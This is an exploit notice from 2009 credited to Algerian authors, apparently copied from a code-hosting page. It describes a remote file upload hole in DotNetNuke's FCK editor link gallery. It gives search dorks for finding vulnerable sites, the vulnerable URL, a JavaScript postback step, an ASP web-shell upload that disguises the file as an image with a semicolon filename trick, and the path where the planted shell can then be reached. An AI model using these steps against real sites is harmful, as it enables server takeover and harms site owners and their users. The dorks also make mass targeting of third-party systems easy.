35 lines
No EOL
1.4 KiB
Text
35 lines
No EOL
1.4 KiB
Text
************************************************************
|
|
** DotNetNuke Remote File upload Vulnerability
|
|
************************************************************
|
|
** Prodcut: DotNetNuke
|
|
** Home : www.DZ4All.cOm/Cc
|
|
** Vunlerability : Remote File upload
|
|
** Risk : High
|
|
** Dork : inurl:tabid/176/Default.aspx or inurl:portals/0/
|
|
************************************************************
|
|
**
|
|
** Original discovery and credit goes to: Alireza Afzali of ISCN Team
|
|
** Found date: 5/17/2009
|
|
** http://securityreason.com/exploitalert/6234
|
|
**
|
|
** Authors : Ra3cH & Ma3sTr0-Dz
|
|
** From : Algeria
|
|
** Contact : e51@hotmail.fr
|
|
** *********************************************************
|
|
** Greetz to : ALLAH
|
|
** All Members of http://www.DZ4All.cOm/Cc
|
|
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & Ma3sTr0-Dz
|
|
************************************************************
|
|
** Exploit:
|
|
** http://[PATH]/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
|
|
**
|
|
** AnD Add : javascript:__doPostBack('ctlURL$cmdUpload','')
|
|
**
|
|
**
|
|
** AnD UpLOaD YoUr ShEll AsP LiKe Dz4aLL.asp;me.jpg
|
|
************************************************************
|
|
**
|
|
** you find your Shell Hier
|
|
**
|
|
** http://[PATH]/portals/0/dz4all.asp;me.jpg
|
|
************************************************************* |